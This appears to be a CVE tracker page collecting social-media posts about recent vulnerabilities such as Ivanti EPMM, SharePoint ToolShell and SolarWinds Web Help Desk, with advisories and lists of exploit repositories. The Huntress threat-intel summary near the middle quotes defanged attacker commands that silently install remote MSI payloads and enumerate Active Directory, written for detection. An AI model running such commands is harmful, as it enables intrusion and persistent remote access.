AAKL@infosec.exchange at 2026-02-10T20:56:25.000Z ##

Palo Alto advisory, posted yesterday:

Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal security.paloaltonetworks.com/ #PaloAlto #infosec #vulnerability

##

CVE-2026-1281
(9.8 CRITICAL)

EPSS: 16.41%

updated 2026-01-30T13:28:18.610000

4 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

1 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

undercodenews@mastodon.social at 2026-02-10T10:24:32.000Z ##

Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws

A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilities—CVE-2026-1281 and CVE-2026-1340—attackers are…

undercodenews.com/stealth-cybe

##

teezeh@ieji.de at 2026-02-10T07:06:07.000Z ##

“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.

The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.

Security teams were told to consider this case an emergency patch situation.”

scworld.com/news/emergency-pat

##

hrbrmstr@mastodon.social at 2026-02-09T07:39:07.000Z ##

Orgs that still daftly run Ivanti kit and didn't patch for CVE-2026-1281 (which is likely most b/c if you're still running Ivanti you have no idea how to do cyber or IT) are gonna have a really bad day today or later this week once they realize what happened to them over the weekend.

##

avuko@infosec.exchange at 2026-02-06T20:57:56.000Z ##

If you have Ivanti EPMM, please follow these instructions.

hub.ivanti.com/s/article/Secur

“Technical Analysis updated with reliable Indicators of Compromise (IoC’s). Both in partnership with NCSC-NL.”

The Dutchies are at it again!🤘🇳🇱

#EPMM #CVE20261281 #CVE20261340 #Ivanti #Cybersecurity #infosec #ioc

##

CVE-2026-1340
(9.8 CRITICAL)

EPSS: 0.18%

updated 2026-01-30T00:31:28

3 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

1 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

undercodenews@mastodon.social at 2026-02-10T10:24:32.000Z ##

Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws

A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilities—CVE-2026-1281 and CVE-2026-1340—attackers are…

undercodenews.com/stealth-cybe

##

teezeh@ieji.de at 2026-02-10T07:06:07.000Z ##

“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.

The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.

Security teams were told to consider this case an emergency patch situation.”

scworld.com/news/emergency-pat

##

avuko@infosec.exchange at 2026-02-06T20:57:56.000Z ##

If you have Ivanti EPMM, please follow these instructions.

hub.ivanti.com/s/article/Secur

“Technical Analysis updated with reliable Indicators of Compromise (IoC’s). Both in partnership with NCSC-NL.”

The Dutchies are at it again!🤘🇳🇱

#EPMM #CVE20261281 #CVE20261340 #Ivanti #Cybersecurity #infosec #ioc

##

CVE-2015-10145
(8.8 HIGH)

EPSS: 0.10%

updated 2026-01-29T18:32:39

2 posts

Gargoyle router management utility versions 1.5.x contain an authenticated OS command execution vulnerability in /utility/run_commands.sh. The application fails to properly restrict or validate input supplied via the 'commands' parameter, allowing an authenticated attacker to execute arbitrary shell commands on the underlying system. Successful exploitation may result in full compromise of the dev

hrbrmstr@mastodon.social at 2026-02-10T14:21:22.000Z ##

@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?

CVE-2015-10145 — Published: 2025-12-31

##

hrbrmstr@mastodon.social at 2026-02-10T14:21:22.000Z ##

@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?

CVE-2015-10145 — Published: 2025-12-31

##

CVE-2025-15467
(9.8 CRITICAL)

EPSS: 0.66%

updated 2026-01-29T15:31:31

3 posts

Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow. Impact summary: A stack buffer overflow may lead to a crash, causing Denial of Service, or potentially remote code execution. When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 para

4 repos

https://github.com/guiimoraes/CVE-2025-15467

https://github.com/MAXI8594/CVE-2025-15467_Scan

https://github.com/mr-r3b00t/CVE-2025-15467

https://github.com/balgan/CVE-2025-15467

AAKL at 2026-02-10T16:30:27.662Z ##

This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.

Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 support.broadcom.com/web/ecx/s

##

AAKL@infosec.exchange at 2026-02-10T16:30:27.000Z ##

This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.

Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 support.broadcom.com/web/ecx/s #infosec #Broadcom #vulnerability

##

neverpanic@chaos.social at 2026-02-08T21:39:37.000Z ##

@gehrke_test "nginx proxy manager" klingt jetzt nicht danach als würde es CMS überhaupt benutzen, und falls doch, ist CVE-2025-15467 auf Platformen mit Stack Canaries (i.e., alles was nicht ranziges embedded Zeug ist) ein denial of service, kein RCE.

##

CVE-2026-21441
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-23T16:05:22

1 posts

### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br

jgilbert@mastodon.social at 2026-02-06T23:20:03.000Z ##

Aw man, someone had to go and ruin all our fun with cve.org/CVERecord?id=CVE-2026- 😩

##

CVE-2026-20817
(7.8 HIGH)

EPSS: 0.06%

updated 2026-01-14T20:31:32.760000

1 posts

Improper handling of insufficient permissions or privileges in Windows Error Reporting allows an authorized attacker to elevate privileges locally.

undercodenews@mastodon.social at 2026-02-10T14:08:37.000Z ##

Windows Error Reporting Flaw Lets Standard Users Reach SYSTEM: Inside CVE-2026-20817

Introduction A quiet but deeply dangerous vulnerability inside Windows Error Reporting (WER) has exposed a new path for local privilege escalation, allowing ordinary users to obtain near-SYSTEM level control. Tracked as CVE-2026-20817 and patched by Microsoft in January 2026, the flaw sits in a core crash-handling mechanism that runs by default on nearly every Windows machine. While no…

undercodenews.com/windows-erro

##

CVE-2024-2511
(5.9 MEDIUM)

EPSS: 3.67%

updated 2025-11-04T00:31:52

1 posts

Issue summary: Some non-default TLS server configurations can cause unbounded memory growth when processing TLSv1.3 sessions Impact summary: An attacker may exploit certain server configurations to trigger unbounded memory growth that would lead to a Denial of Service This problem can occur in TLSv1.3 if the non-default SSL_OP_NO_TICKET option is being used (but not if early_data support is also

certvde at 2026-02-10T07:51:50.697Z ##

VDE-2025-109
Phoenix Contact: Unbounded growth of the session cache in TCP encapsulation service in FL MGUARD 2xxx and 4xxx firmware

The OpenSSL library used in the affected products is vulnerable to an unbounded growth of the session cache in the TLSv1.3 implementation.
CVE-2024-2511

certvde.com/en/advisories/vde-

phoenixcontact.csaf-tp.certvde

##

CVE-2025-53770
(9.8 CRITICAL)

EPSS: 89.20%

updated 2025-10-27T17:12:40.607000

4 posts

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation

Nuclei template

46 repos

https://github.com/tripoloski1337/CVE-2025-53770-scanner

https://github.com/chrisalee27-dotcom/SOC-Incident-Response-Portfolio

https://github.com/behnamvanda/CVE-2025-53770-Checker

https://github.com/Bluefire-Redteam-Cybersecurity/bluefire-sharepoint-cve-2025-53770

https://github.com/n1chr0x/ZeroPoint

https://github.com/ghostn4444/CVE-2025-53770

https://github.com/ZephrFish/CVE-2025-53770-Scanner

https://github.com/AdityaBhatt3010/CVE-2025-53770-SharePoint-Zero-Day-Variant-Exploited-for-Full-RCE

https://github.com/bossnick98/-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

https://github.com/yosasasutsut/Blackash-CVE-2025-53770

https://github.com/RukshanaAlikhan/CVE-2025-53770

https://github.com/anwakub/CVE-2025-53770

https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator

https://github.com/harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC

https://github.com/CyprianAtsyor/ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend

https://github.com/Rabbitbong/OurSharePoint-CVE-2025-53770

https://github.com/Agampreet-Singh/CVE-2025-53770

https://github.com/peiqiF4ck/WebFrameworkTools-5.5-enhance

https://github.com/nisargsuthar/suricata-rule-CVE-2025-53770

https://github.com/Cameloo1/sharepoint-toolshell-micro-postmortem

https://github.com/daryllundy/CVE-2025-53770

https://github.com/3a7/CVE-2025-53770

https://github.com/hazcod/CVE-2025-53770

https://github.com/paolokappa/SharePointSecurityMonitor

https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320

https://github.com/bitsalv/ToolShell-Honeypot

https://github.com/exfil0/CVE-2025-53770

https://github.com/MuhammadWaseem29/CVE-2025-53770

https://github.com/kaizensecurity/CVE-2025-53770

https://github.com/0x-crypt/CVE-2025-53770-Scanner

https://github.com/0xray5c68616e37/cve-2025-53770

https://github.com/go-bi/sharepoint-CVE-2025-53770

https://github.com/Michaael01/LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

https://github.com/Udyz/CVE-2025-53770-Exploit

https://github.com/GreenForceNetworks/Toolshell_CVE-2025-53770

https://github.com/unk9vvn/sharepoint-toolpane

https://github.com/bharath-cyber-root/sharepoint-toolshell-cve-2025-53770

https://github.com/saladin0x1/CVE-2025-53770

https://github.com/soltanali0/CVE-2025-53770-Exploit

https://github.com/Immersive-Labs-Sec/SharePoint-CVE-2025-53770-POC

https://github.com/grupooruss/CVE-2025-53770-Checker

https://github.com/Sec-Dan/CVE-2025-53770-Scanner

https://github.com/zach115th/ToolShellFinder

https://github.com/r3xbugbounty/CVE-2025-53770

https://github.com/siag-itsec/CVE-2025-53770-Hunting

https://github.com/imbas007/CVE-2025-53770-Vulnerable-Scanner

oversecurity@mastodon.social at 2026-02-10T08:43:36.000Z ##

What Defined Defense in 2025

Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...

🔗️ [Binarydefense] link.is.it/3GT18k

##

oversecurity@mastodon.social at 2026-02-10T08:40:37.000Z ##

What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…

CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…

🔗️ [Binarydefense] link.is.it/EtPFu3

##

oversecurity@mastodon.social at 2026-02-10T08:43:36.000Z ##

What Defined Defense in 2025

Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...

🔗️ [Binarydefense] link.is.it/3GT18k

##

oversecurity@mastodon.social at 2026-02-10T08:40:37.000Z ##

What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…

CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…

🔗️ [Binarydefense] link.is.it/EtPFu3

##

hrbrmstr@mastodon.social at 2026-02-07T07:56:43.000Z ##

Apache Tomcat is far and away the most likely intended target given port 8080 and the Java exception body content. The DefaultServlet with readonly=false in web.xml is the textbook case (CVE-2017-12615, CVE-2017-12617). Eclipse Jetty can also expose similar behavior if its DefaultServlet or WebDAV module is configured to allow PUT writes. Apache TomEE, being Tomcat-based with Jakarta EE extensions, inherits all of the same misconfigurations. (5/15)

##

CVE-2017-12617
(8.1 HIGH)

EPSS: 94.36%

updated 2025-10-22T17:30:39

1 posts

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Nuclei template

13 repos

https://github.com/DevaDJ/CVE-2017-12617

https://github.com/tyranteye666/tomcat-cve-2017-12617

https://github.com/LongWayHomie/CVE-2017-12617

https://github.com/K3ysTr0K3R/CVE-2017-12617-EXPLOIT

https://github.com/cyberheartmi9/CVE-2017-12617

https://github.com/TheRealCiscoo/Tomcat_CVE201712617

https://github.com/jptr218/tc_hack

https://github.com/devcoinfet/CVE-2017-12617

https://github.com/yZee00/CVE-2017-12617

https://github.com/zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717

https://github.com/qiantu88/CVE-2017-12617

https://github.com/ygouzerh/CVE-2017-12617

https://github.com/scirusvulgaris/CVE-2017-12617

hrbrmstr@mastodon.social at 2026-02-07T07:56:43.000Z ##

Apache Tomcat is far and away the most likely intended target given port 8080 and the Java exception body content. The DefaultServlet with readonly=false in web.xml is the textbook case (CVE-2017-12615, CVE-2017-12617). Eclipse Jetty can also expose similar behavior if its DefaultServlet or WebDAV module is configured to allow PUT writes. Apache TomEE, being Tomcat-based with Jakarta EE extensions, inherits all of the same misconfigurations. (5/15)

##

CVE-2025-22225
(8.3 HIGH)

EPSS: 5.41%

updated 2025-10-22T00:33:13

1 posts

VMware ESXi contains an arbitrary write vulnerability. A malicious actor with privileges within the VMX process may trigger an arbitrary kernel write leading to an escape of the sandbox.

youranonnewsirc@nerdculture.de at 2026-02-09T07:45:46.000Z ##

Here's a summary of recent important global, technology, and cybersecurity news:

**Global:**
US-Iran talks continued, with the US demanding nuclear concessions (Feb 7). Italy thwarted suspected Russian cyberattacks targeting government and Olympic-linked websites (Feb 6).

**Technology:**
Big Tech firms (Amazon, Alphabet, Meta, Microsoft) are committing $650B to AI infrastructure in 2026. OpenAI launched Frontier, an enterprise AI agent platform (Feb 6). Intel and AMD warned China of server CPU shortages, citing AI demand and US export rules (Feb 6).

**Cybersecurity:**
CISA ordered US federal agencies to remove unsupported edge network devices to reduce risk (Feb 6). Ransomware groups are actively exploiting a critical VMware ESXi flaw (CVE-2025-22225) (Feb 6). Global cybersecurity laws are tightening, mandating rapid incident reporting (Feb 7).

#News #Anonymous #AnonNews_irc

##

CVE-2025-26399
(9.8 CRITICAL)

EPSS: 12.86%

updated 2025-09-23T06:30:33

6 posts

SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxProxy deserialization remote code execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. This vulnerability is a patch bypass of CVE-2024-28988, which in turn is a patch bypass of CVE-2024-28986.

1 repos

https://github.com/rxerium/CVE-2025-26399

hasamba at 2026-02-10T14:26:34.786Z ##

----------------

🎯 Threat Intelligence
===================

Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.

Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.

Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.

Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.

Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.

🔹 solarwinds -2025-26399 -2025-40551

🔗 Source: huntress.com/blog/active-explo

##

VirusBulletin at 2026-02-10T09:22:28.568Z ##

Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. huntress.com/blog/active-explo

##

cyberhost_blocklist at 2026-02-10T09:07:06.412Z ##

🛡️ CyberHost Malware List Stats 🛡️
3 new domains were added yesterday
Threat Intel Used:
huntress.com/blog/active-explo

Blocklist Details: cyberhost.uk/malware-blocklist

##

VirusBulletin@infosec.exchange at 2026-02-10T09:22:28.000Z ##

Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. huntress.com/blog/active-explo

##

AAKL@infosec.exchange at 2026-02-09T16:44:21.000Z ##

From yesterday.

Huntress: Active Exploitation of SolarWinds Web Help Desk huntress.com/blog/active-explo @huntress #infosec #SolarWinds #vulnerability #threatresearch

##

huntress@infosec.exchange at 2026-02-09T02:49:47.000Z ##

Hat tip to @JohnHammond @gleeda @russianpanda9xx et al

huntress.com/blog/active-explo

##

CVE-2025-27158
(7.8 HIGH)

EPSS: 0.04%

updated 2025-03-12T15:33:04

1 posts

Acrobat Reader versions 24.001.30225, 20.005.30748, 25.001.20428 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

valkyrie.hacker.gf@bsky.brid.gy at 2026-02-10T07:45:24.926Z ##

you were literally shown an example of a recent Acrobat Reader bug that potentially could lead to RCE - many other examples are available, like www.cvedetails.com/cve/CVE-2025...; if you want more, Google is right where you left it

CVE-2025-27158 : Acrobat Reade...

##

CVE-2026-25506
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-10T21:42:24.000Z ##

🟠 CVE-2026-25506 - High (7.7)

MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:42:24.000Z ##

🟠 CVE-2026-25506 - High (7.7)

MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-26009
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-10T21:42:14.000Z ##

🔴 CVE-2026-26009 - Critical (9.9)

Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:42:14.000Z ##

🔴 CVE-2026-26009 - Critical (9.9)

Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

wordfence@mastodon.social at 2026-02-10T19:27:51.000Z ##

A critical arbitrary file upload vulnerability (CVE-2026-1357, CVSS 9.8) was discovered in the WPvivid Backup & Migration plugin, which is installed on over 800,000 WordPress sites.

The flaw allows unauthenticated attackers to upload arbitrary files, potentially achieving remote code execution and full site takeover.

Update to version 0.9.124. Wordfence Premium users received firewall protection on January 22.

wordfence.com/blog/2026/02/800

#WordPress #WebSecurity #Wordfence

##

CVE-2026-24682
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-10T15:05:04.000Z ##

🟠 CVE-2026-24682 - High (7.5)

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T15:05:04.000Z ##

🟠 CVE-2026-24682 - High (7.5)

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25646
(0 None)

EPSS: 0.00%

2 posts

N/A

harrysintonen at 2026-02-10T07:34:51.165Z ##

libpng 1.6.55 has been released with fix to CVE-2026-25646:

"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.

The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.

The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).

Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.

This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."

Announcement: openwall.com/lists/oss-securit
Advisory: github.com/pnggroup/libpng/sec
Fix: github.com/pnggroup/libpng/com

##

harrysintonen@infosec.exchange at 2026-02-10T07:34:51.000Z ##

libpng 1.6.55 has been released with fix to CVE-2026-25646:

"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.

The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.

The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).

Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.

This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."

Announcement: openwall.com/lists/oss-securit
Advisory: github.com/pnggroup/libpng/sec
Fix: github.com/pnggroup/libpng/com

#CVE_2026_25646 #vulnerability #infosec #cybersecurity

##

CVE-2026-24476
(0 None)

EPSS: 0.03%

2 posts

N/A

jvalleroy@fosstodon.org at 2026-02-10T03:20:43.000Z ##

I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.

The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security

More information about the issue:
github.com/shaarli/Shaarli/sec
security-tracker.debian.org/tr

#Shaarli #Debian #FreedomBox

##

jvalleroy@fosstodon.org at 2026-02-10T03:20:43.000Z ##

I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.

The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security

More information about the issue:
github.com/shaarli/Shaarli/sec
security-tracker.debian.org/tr

#Shaarli #Debian #FreedomBox

##

CVE-2026-23876
(0 None)

EPSS: 0.06%

1 posts

N/A

linux@activitypub.awakari.com at 2026-02-10T14:27:01.000Z ## Ubuntu 24.04 LTS ImageMagick Important Denial Service 8021-1 CVE-2026-23876 ImageMagick could be made to crash or run programs as your login if it opened a specially crafted file.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-25931
(0 None)

EPSS: 0.01%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T23:23:13.000Z ##

🟠 CVE-2026-25931 - High (7.8)

vscode-spell-checker is a basic spell checker that works well with code and documents. Prior to v4.5.4, DocumentSettings._determineIsTrusted treats the configuration value cSpell.trustedWorkspace as the authoritative trust flag. The value defaults...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25808
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T22:26:20.000Z ##

🟠 CVE-2026-25808 - High (7.5)

Hollo is a federated single-user microblogging software designed to be federated through ActivityPub. Prior to 0.6.20 and 0.7.2, there is a security vulnerability where DMs and followers-only posts were exposed through the ActivityPub outbox endpo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25880
(0 None)

EPSS: 0.01%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T22:18:25.000Z ##

🟠 CVE-2026-25880 - High (7.8)

SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, the PDF reader allows execution of a malicious binary (explorer.exe) located in the same directory as the opened PDF when the user clicks File → “Show in folder”. This be...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25925
(0 None)

EPSS: 0.05%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T22:16:52.000Z ##

🟠 CVE-2026-25925 - High (7.8)

PowerDocu contains a Windows GUI executable to perform technical documentations. Prior to 2.4.0, PowerDocu contains a critical security vulnerability in how it parses JSON files within Flow or App packages. The application blindly trusts the $type...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25231
(0 None)

EPSS: 0.06%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T20:24:01.000Z ##

🟠 CVE-2026-25231 - High (7.5)

FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T20:23:41.000Z ##

🟠 CVE-2026-25231 - High (7.5)

FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25057
(0 None)

EPSS: 0.04%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T20:23:31.000Z ##

🔴 CVE-2026-25057 - Critical (9.1)

MarkUs is a web application for the submission and grading of student assignments. Prior to 2.9.1, instructors are able to upload a zip file to create an assignment from an exported configuration (courses//assignments/upload_config_files). The upl...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25740
(0 None)

EPSS: 0.01%

1 posts

N/A

CVE-2026-25644
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-06T23:21:39.000Z ##

🟠 CVE-2026-25644 - High (7.5)

DataHub is an open-source metadata platform. Prior to version 1.3.1.8, the LDAP ingestion source is vulnerable to MITM attack through TLS downgrade. This issue has been patched in version 1.3.1.8.

